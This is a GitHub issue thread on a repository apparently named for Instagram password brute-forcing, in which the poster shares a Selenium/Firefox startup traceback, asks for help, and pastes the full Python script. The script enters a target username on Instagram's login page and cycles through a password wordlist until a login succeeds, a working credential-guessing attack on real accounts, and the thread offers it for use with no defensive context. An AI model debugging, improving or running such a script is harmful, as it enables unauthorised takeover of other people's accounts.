### ISSUE TITLE
error?? why?

### ISSUE THREAD

**Issue by omidsan** [mathismathis/instagram-brute-force-script-with-python#1]
root@Lenovo:/home/omid/Desktop/instagram-brute-force-script-with-python-master# python3 ma.py
Traceback (most recent call last):
  File "ma.py", line 6, in <module>
    webdriver = webdriver.Firefox()
  File "/usr/local/lib/python3.8/dist-packages/selenium/webdriver/firefox/webdriver.py", line 170, in __init__
    RemoteWebDriver.__init__(
  File "/usr/local/lib/python3.8/dist-packages/selenium/webdriver/remote/webdriver.py", line 152, in __init__
    self.start_session(capabilities, browser_profile)
  File "/usr/local/lib/python3.8/dist-packages/selenium/webdriver/remote/webdriver.py", line 249, in start_session
    response = self.execute(Command.NEW_SESSION, parameters)
  File "/usr/local/lib/python3.8/dist-packages/selenium/webdriver/remote/webdriver.py", line 318, in execute
    self.error_handler.check_response(response)
  File "/usr/local/lib/python3.8/dist-packages/selenium/webdriver/remote/errorhandler.py", line 242, in check_response
    raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.WebDriverException: Message: Process unexpectedly closed with status 1

**Comment by omidsan** [comment]
please help mr.

**Comment by omidsan** [comment]
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from time import sleep

webdriver = webdriver.Firefox()
webdriver.get('https://www.instagram.com/accounts/login/')
sleep(3)
username = webdriver.find_element_by_name('username')

username.send_keys('enter user name')

password = webdriver.find_element_by_name('password')
passfile=open('mat.txt','r')
def display(a):
    print("log in password  "+a)
for i in passfile:
    try:
        password.send_keys(i)
        submit = webdriver.find_element_by_tag_name('form')
        submit.submit()
        c=webdriver.current_url
        sleep(5)
        b=webdriver.find_element_by_xpath("//button[contains(text(), 'Not Now')]")
        b.click()
        sleep(5)
        c=webdriver.current_url
    except NoSuchElementException:
        password.send_keys(Keys.CONTROL,"a",Keys.DELETE)
        sleep(5)
        url2=webdriver.current_url
    if c!=url2:
        display(i)
        break
